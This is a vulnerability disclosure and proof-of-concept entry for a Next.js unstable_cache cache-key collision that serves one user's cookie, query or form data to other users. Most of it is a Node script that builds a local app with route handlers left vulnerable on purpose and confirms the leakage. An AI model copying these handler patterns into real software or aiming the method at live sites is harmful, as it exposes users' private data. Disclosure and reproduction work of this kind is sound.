PoC Archive PoC Archive
High None assigned as of 2026-07-03 unpatched

Next.js unstable_cache Object-Argument Cache-Key Collision

by bikini (@ashdfrkl) — original discovery; mirrored via exploitarium · 2026-07-03

Severity
High
CVE
None assigned as of 2026-07-03
Category
web
Affected product
Next.js (App Router, Data Cache)
Affected versions
next@16.3.0-canary.70 (behavior demonstrated against this canary; likely affects a broader range of unstable_cache() implementations)
Disclosed
2026-07-03
Patch status
unpatched

Metadata

FieldValue
Date Added2026-07-03
Last Updated2026-07
Author / Researcherbikini (@ashdfrkl) — original discovery; mirrored via exploitarium
CVE / AdvisoryNone assigned as of 2026-07-03
Categoryweb
SeverityHigh
CVSS ScoreNot yet scored (no CVE/CVSS assigned)
StatusPoC
Tagsnextjs, unstable_cache, cache-poisoning, cache-key-collision, data-cache, information-disclosure, server-side-caching, javascript
RelatedN/A

Affected Target

FieldValue
Software / SystemNext.js (App Router, Data Cache)
Versions Affectednext@16.3.0-canary.70 (behavior demonstrated against this canary; likely affects a broader range of unstable_cache() implementations)
Language / PlatformJavaScript/Node.js PoC driving a generated Next.js application
Authentication RequiredNo
Network Access RequiredYes (PoC drives HTTP requests against a locally started next start server; applies to any deployment reachable by multiple users)

Summary

Next.js’s unstable_cache() API derives its cache key by running JSON.stringify() over the arguments passed to the cached function. When a route handler passes a stock request-wrapper object — a Request, URLSearchParams, or FormData instance — directly into unstable_cache(), JSON.stringify() serializes that object as an empty {} because these objects do not expose their internal state to naive JSON serialization. Because the serialized key collapses to the same value regardless of the object’s actual contents (cookies, query parameters, form fields), Next.js treats requests carrying entirely different user-specific data as identical cache entries. The first request’s result — and the live, request-specific data it captured — is returned to every subsequent request in the same cache group, even after the caching server process is restarted. This PoC was published by a pseudonymous independent researcher (bikini/ashdfrkl) as part of the uncoordinated “exploitarium” vulnerability dump; it has not been vendor-confirmed.


Vulnerability Details

Root Cause

unstable_cache() computes its cache key via JSON.stringify() on the callback’s arguments. Stock Web API objects like Request, URLSearchParams, and FormData serialize to {} under JSON.stringify(), so distinct invocations carrying different request-specific data collide onto the same cache key while the cached callback body still reads the live object’s actual contents.

Attack Vector

  1. A route handler passes a Request, URLSearchParams, or FormData object directly into unstable_cache() instead of extracting the specific primitive values it needs first.
  2. A first user (e.g., “alice”) makes a request carrying user-specific data (a cookie, query parameter, or form field).
  3. Next.js computes the cache key as {} (since the wrapper object stringifies to an empty object) and stores the result, which was computed using alice’s live data.
  4. A second user (“bob”) makes a request with different data; because the cache key is identical ({}), Next.js serves alice’s cached result to bob instead of computing bob’s own result.
  5. The stale/cross-user result persists in the Data Cache even across a restart of the next start process.

Impact

Cross-user cache poisoning and information disclosure: one user’s request-specific response (potentially containing session-bound or sensitive data) can be served to a completely different, unrelated user, and the effect persists across server restarts as long as the underlying Data Cache entry survives.


Environment / Lab Setup

Target:   Next.js application (App Router) using next@16.3.0-canary.70, react@19.2.3, react-dom@19.2.3
Attacker: Node.js 20+, npm, network access to install Next.js and drive HTTP requests

Proof of Concept

PoC Script

See run_demo.mjs in this folder.

1
node run_demo.mjs

The script scaffolds a temporary Next.js application exposing three route handlers (/api/request, /api/urlsearch, /api/form) that pass a Request, URLSearchParams, or FormData object directly into unstable_cache(). It builds and starts the app, sends a request as “alice” followed by a request as “bob” to each route, and verifies that the second request receives alice’s cached result instead of bob’s own data — including after restarting the server without clearing the generated app directory.


Detection & Indicators of Compromise

Signs of compromise:

  • Users reporting they see another user’s data (session content, personalized values) on a page that should be user-specific
  • Cached API responses that do not vary despite differing request cookies, query strings, or submitted form data
  • Stale cross-user data persisting even after a deployment restart

Remediation

ActionDetail
Primary fixNo vendor patch confirmed as of 2026-07-03 — monitor for advisory
Interim mitigationNever pass Request, URLSearchParams, FormData, or other non-JSON-serializable wrapper objects directly into unstable_cache(); extract the specific primitive values (cookie value, query parameter, form field) needed and pass those instead

References


Notes

Mirrored from https://github.com/bikini/exploitarium (folder: nextjs-unstable-cache-object-argument-collision) on 2026-07-03. No CVE has been assigned as of ingestion — this is an uncoordinated disclosure by a pseudonymous researcher; treat with appropriate caution pending vendor confirmation.

run_demo.mjs
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
import childProcess from 'node:child_process'
import fs from 'node:fs/promises'
import net from 'node:net'
import os from 'node:os'
import path from 'node:path'
import process from 'node:process'
import { fileURLToPath } from 'node:url'

const root = path.dirname(fileURLToPath(import.meta.url))

function parseArgs(argv) {
  const args = {
    workDir: path.join(root, 'run', 'stock-nextjs-unstable-cache'),
    port: 3560,
    nextVersion: '16.3.0-canary.70',
    keepServer: false,
  }
  for (let i = 0; i < argv.length; i += 1) {
    const arg = argv[i]
    if (arg === '--work-dir') {
      args.workDir = path.resolve(argv[++i])
    } else if (arg === '--port') {
      args.port = Number(argv[++i])
    } else if (arg === '--next-version') {
      args.nextVersion = argv[++i]
    } else if (arg === '--keep-server') {
      args.keepServer = true
    } else {
      throw new Error(`unknown argument: ${arg}`)
    }
  }
  return args
}

async function writeFile(name, data) {
  await fs.mkdir(path.dirname(name), { recursive: true })
  await fs.writeFile(name, data)
}

function run(cmd, args, cwd) {
  const npmCli = path.join(path.dirname(process.execPath), 'node_modules', 'npm', 'bin', 'npm-cli.js')
  const command = process.platform === 'win32' && cmd === 'npm' ? process.execPath : cmd
  const finalArgs = process.platform === 'win32' && cmd === 'npm' ? [npmCli, ...args] : args
  const result = childProcess.spawnSync(command, finalArgs, {
    cwd,
    encoding: 'utf8',
  })
  return result
}

function spawnNext(appDir, port) {
  return childProcess.spawn(
    process.execPath,
    ['node_modules/next/dist/bin/next', 'start', '-H', '127.0.0.1', '-p', String(port)],
    {
      cwd: appDir,
      stdio: ['ignore', 'pipe', 'pipe'],
      windowsHide: true,
    }
  )
}

async function waitForPort(port, proc) {
  const start = Date.now()
  let output = ''
  proc.stdout.on('data', (chunk) => {
    output += chunk.toString()
  })
  proc.stderr.on('data', (chunk) => {
    output += chunk.toString()
  })
  while (Date.now() - start < 30000) {
    if (proc.exitCode !== null) {
      throw new Error(`next exited early with ${proc.exitCode}\n${output}`)
    }
    try {
      await new Promise((resolve, reject) => {
        const socket = net.connect(port, '127.0.0.1')
        socket.once('connect', () => {
          socket.end()
          resolve()
        })
        socket.once('error', reject)
      })
      return output
    } catch {
      await new Promise((resolve) => setTimeout(resolve, 250))
    }
  }
  throw new Error(`timed out waiting for next\n${output}`)
}

async function stop(proc) {
  if (proc && proc.exitCode === null) {
    proc.kill('SIGTERM')
    await new Promise((resolve) => {
      const timer = setTimeout(resolve, 5000)
      proc.once('exit', () => {
        clearTimeout(timer)
        resolve()
      })
    })
  }
}

async function get(origin, pathname, cookie) {
  const res = await fetch(`${origin}${pathname}`, {
    headers: cookie ? { cookie } : {},
    redirect: 'manual',
  })
  return {
    status: res.status,
    body: (await res.text()).trim(),
  }
}

async function post(origin, pathname, fields) {
  const res = await fetch(`${origin}${pathname}`, {
    method: 'POST',
    headers: { 'content-type': 'application/x-www-form-urlencoded' },
    body: new URLSearchParams(fields),
    redirect: 'manual',
  })
  return {
    status: res.status,
    body: (await res.text()).trim(),
  }
}

function includesAll(text, needles) {
  return needles.every((needle) => text.includes(needle))
}

async function createApp(appDir, nextVersion) {
  await fs.rm(appDir, { recursive: true, force: true })
  await fs.mkdir(appDir, { recursive: true })
  await writeFile(path.join(appDir, 'package.json'), `${JSON.stringify({
    private: true,
    scripts: {
      build: 'next build',
      start: 'next start -H 127.0.0.1',
    },
    dependencies: {
      next: nextVersion,
      react: '19.2.3',
      'react-dom': '19.2.3',
    },
  }, null, 2)}\n`)
  await writeFile(path.join(appDir, 'next.config.js'), 'module.exports = {}\n')
  await writeFile(path.join(appDir, 'app', 'layout.jsx'), `export default function RootLayout({ children }) {
  return (
    <html>
      <body>{children}</body>
    </html>
  )
}
`)
  await writeFile(path.join(appDir, 'app', 'page.jsx'), `export default function Page() {
  return <main>ready</main>
}
`)
  await writeFile(path.join(appDir, 'app', 'api', 'request', 'route.js'), `import { unstable_cache } from 'next/cache'

export const dynamic = 'force-dynamic'

function cachedRequestFor(group) {
  return unstable_cache(
    async (request) => {
      return \`REQ_COOKIE=\${request.headers.get('cookie') ?? 'missing'};REQ_URL=\${request.url};JSON=\${JSON.stringify(request)};TS=\${Date.now()}\`
    },
    ['request-object', group],
    { revalidate: 3600 }
  )
}

function cachedRequestValueFor(group) {
  return unstable_cache(
    async (cookieHeader) => {
      return \`REQ_VALUE_COOKIE=\${cookieHeader ?? 'missing'};TS=\${Date.now()}\`
    },
    ['request-value', group],
    { revalidate: 3600 }
  )
}

export async function GET(request) {
  const url = new URL(request.url)
  const group = url.searchParams.get('group') || 'default'
  const mode = url.searchParams.get('mode') || 'object'
  const result = mode === 'value'
    ? await cachedRequestValueFor(group)(request.headers.get('cookie'))
    : await cachedRequestFor(group)(request)
  return new Response(result, { headers: { 'content-type': 'text/plain' } })
}
`)
  await writeFile(path.join(appDir, 'app', 'api', 'urlsearch', 'route.js'), `import { unstable_cache } from 'next/cache'

export const dynamic = 'force-dynamic'

function cachedUrlSearchFor(group) {
  return unstable_cache(
    async (searchParams) => {
      return \`URL_SECRET=\${searchParams.get('secret') ?? 'missing'};JSON=\${JSON.stringify(searchParams)};TS=\${Date.now()}\`
    },
    ['urlsearch-object', group],
    { revalidate: 3600 }
  )
}

function cachedUrlSearchValueFor(group) {
  return unstable_cache(
    async (secret) => {
      return \`URL_VALUE_SECRET=\${secret ?? 'missing'};TS=\${Date.now()}\`
    },
    ['urlsearch-value', group],
    { revalidate: 3600 }
  )
}

export async function GET(request) {
  const searchParams = new URL(request.url).searchParams
  const group = searchParams.get('group') || 'default'
  const mode = searchParams.get('mode') || 'object'
  const result = mode === 'value'
    ? await cachedUrlSearchValueFor(group)(searchParams.get('secret'))
    : await cachedUrlSearchFor(group)(searchParams)
  return new Response(result, { headers: { 'content-type': 'text/plain' } })
}
`)
  await writeFile(path.join(appDir, 'app', 'api', 'form', 'route.js'), `import { unstable_cache } from 'next/cache'

export const dynamic = 'force-dynamic'

function cachedFormFor(group) {
  return unstable_cache(
    async (formData) => {
      return \`FORM_SECRET=\${formData.get('secret') ?? 'missing'};JSON=\${JSON.stringify(formData)};TS=\${Date.now()}\`
    },
    ['form-object', group],
    { revalidate: 3600 }
  )
}

function cachedFormValueFor(group) {
  return unstable_cache(
    async (secret) => {
      return \`FORM_VALUE_SECRET=\${secret ?? 'missing'};TS=\${Date.now()}\`
    },
    ['form-value', group],
    { revalidate: 3600 }
  )
}

export async function POST(request) {
  const formData = await request.formData()
  const group = formData.get('group') || 'default'
  const mode = formData.get('mode') || 'object'
  const result = mode === 'value'
    ? await cachedFormValueFor(group)(formData.get('secret'))
    : await cachedFormFor(group)(formData)
  return new Response(result, { headers: { 'content-type': 'text/plain' } })
}
`)
}

async function main() {
  const args = parseArgs(process.argv.slice(2))
  const appDir = path.join(args.workDir, 'app')
  const logsDir = path.join(args.workDir, 'logs')
  const origin = `http://127.0.0.1:${args.port}`
  await fs.rm(args.workDir, { recursive: true, force: true })
  await fs.mkdir(logsDir, { recursive: true })
  await createApp(appDir, args.nextVersion)

  const install = run('npm', ['install', '--no-audit', '--no-fund'], appDir)
  await writeFile(path.join(logsDir, 'npm-install.stdout.log'), install.stdout ?? '')
  await writeFile(path.join(logsDir, 'npm-install.stderr.log'), install.stderr ?? String(install.error ?? ''))
  if (install.status !== 0) {
    throw new Error('npm install failed')
  }

  const build = run('npm', ['run', 'build'], appDir)
  await writeFile(path.join(logsDir, 'next-build.stdout.log'), build.stdout ?? '')
  await writeFile(path.join(logsDir, 'next-build.stderr.log'), build.stderr ?? String(build.error ?? ''))
  if (build.status !== 0) {
    throw new Error('next build failed')
  }

  let server
  const evidence = {
    nextVersion: args.nextVersion,
    platform: `${os.platform()} ${os.arch()}`,
    node: process.version,
    results: {},
    restart: {},
  }

  try {
    server = spawnNext(appDir, args.port)
    evidence.startup = await waitForPort(args.port, server)

    evidence.results.requestObjectAliceBob = [
      await get(origin, '/api/request?group=request-a&case=alice', 'victim=alice'),
      await get(origin, '/api/request?group=request-a&case=bob', 'victim=bob'),
    ]
    evidence.results.requestObjectBobAlice = [
      await get(origin, '/api/request?group=request-b&case=bob', 'victim=bob'),
      await get(origin, '/api/request?group=request-b&case=alice', 'victim=alice'),
    ]
    evidence.results.requestValueControl = [
      await get(origin, '/api/request?mode=value&group=request-value', 'victim=alice'),
      await get(origin, '/api/request?mode=value&group=request-value', 'victim=bob'),
    ]
    evidence.results.urlSearchAliceBob = [
      await get(origin, '/api/urlsearch?group=url-a&secret=alice'),
      await get(origin, '/api/urlsearch?group=url-a&secret=bob'),
    ]
    evidence.results.urlSearchBobAlice = [
      await get(origin, '/api/urlsearch?group=url-b&secret=bob'),
      await get(origin, '/api/urlsearch?group=url-b&secret=alice'),
    ]
    evidence.results.urlSearchValueControl = [
      await get(origin, '/api/urlsearch?mode=value&group=url-value&secret=alice'),
      await get(origin, '/api/urlsearch?mode=value&group=url-value&secret=bob'),
    ]
    evidence.results.formDataAliceBob = [
      await post(origin, '/api/form', { group: 'form-a', secret: 'alice' }),
      await post(origin, '/api/form', { group: 'form-a', secret: 'bob' }),
    ]
    evidence.results.formDataBobAlice = [
      await post(origin, '/api/form', { group: 'form-b', secret: 'bob' }),
      await post(origin, '/api/form', { group: 'form-b', secret: 'alice' }),
    ]
    evidence.results.formDataValueControl = [
      await post(origin, '/api/form', { mode: 'value', group: 'form-value', secret: 'alice' }),
      await post(origin, '/api/form', { mode: 'value', group: 'form-value', secret: 'bob' }),
    ]

    await stop(server)
    server = undefined

    server = spawnNext(appDir, args.port)
    evidence.restartStartup = await waitForPort(args.port, server)
    evidence.restart.requestObject = await get(origin, '/api/request?group=request-a&case=charlie', 'victim=charlie')
    evidence.restart.urlSearch = await get(origin, '/api/urlsearch?group=url-a&secret=charlie')
    evidence.restart.formData = await post(origin, '/api/form', { group: 'form-a', secret: 'charlie' })
  } finally {
    if (!args.keepServer) {
      await stop(server)
    }
  }

  const checks = {
    requestObjectAliceBob: includesAll(evidence.results.requestObjectAliceBob[1].body, ['REQ_COOKIE=victim=alice', 'JSON={}']),
    requestObjectBobAlice: includesAll(evidence.results.requestObjectBobAlice[1].body, ['REQ_COOKIE=victim=bob', 'JSON={}']),
    requestValueControl: evidence.results.requestValueControl[0].body.includes('victim=alice') && evidence.results.requestValueControl[1].body.includes('victim=bob'),
    urlSearchAliceBob: includesAll(evidence.results.urlSearchAliceBob[1].body, ['URL_SECRET=alice', 'JSON={}']),
    urlSearchBobAlice: includesAll(evidence.results.urlSearchBobAlice[1].body, ['URL_SECRET=bob', 'JSON={}']),
    urlSearchValueControl: evidence.results.urlSearchValueControl[0].body.includes('URL_VALUE_SECRET=alice') && evidence.results.urlSearchValueControl[1].body.includes('URL_VALUE_SECRET=bob'),
    formDataAliceBob: includesAll(evidence.results.formDataAliceBob[1].body, ['FORM_SECRET=alice', 'JSON={}']),
    formDataBobAlice: includesAll(evidence.results.formDataBobAlice[1].body, ['FORM_SECRET=bob', 'JSON={}']),
    formDataValueControl: evidence.results.formDataValueControl[0].body.includes('FORM_VALUE_SECRET=alice') && evidence.results.formDataValueControl[1].body.includes('FORM_VALUE_SECRET=bob'),
    restartRequestObject: evidence.restart.requestObject.body.includes('REQ_COOKIE=victim=alice'),
    restartUrlSearch: evidence.restart.urlSearch.body.includes('URL_SECRET=alice'),
    restartFormData: evidence.restart.formData.body.includes('FORM_SECRET=alice'),
  }
  evidence.checks = checks
  const confirmed = Object.values(checks).every(Boolean)
  evidence.confirmed = confirmed
  await writeFile(path.join(logsDir, 'evidence.json'), `${JSON.stringify(evidence, null, 2)}\n`)

  const markerFile = path.join(args.workDir, 'VULNERABILITY_CONFIRMED.marker')
  if (confirmed) {
    await writeFile(markerFile, [
      'confirmed=true',
      `next_version=${args.nextVersion}`,
      'request_object_second_seen=alice',
      'urlsearch_second_seen=alice',
      'formdata_second_seen=alice',
      'restart_request_object_seen=alice',
      'restart_urlsearch_seen=alice',
      'restart_formdata_seen=alice',
      '',
    ].join('\n'))
  }

  console.log(`next_version=${args.nextVersion}`)
  console.log(`build_exit=${build.status}`)
  for (const [name, value] of Object.entries(checks)) {
    console.log(`${name}=${value}`)
  }
  console.log(`confirmed=${confirmed}`)
  console.log(`marker_file=${confirmed ? markerFile : ''}`)
  console.log(`evidence_json=${path.join(logsDir, 'evidence.json')}`)
  console.log(`work_dir=${args.workDir}`)
  if (!confirmed) {
    process.exitCode = 1
  }
}

main().catch((error) => {
  console.error(error.stack || String(error))
  process.exitCode = 1
})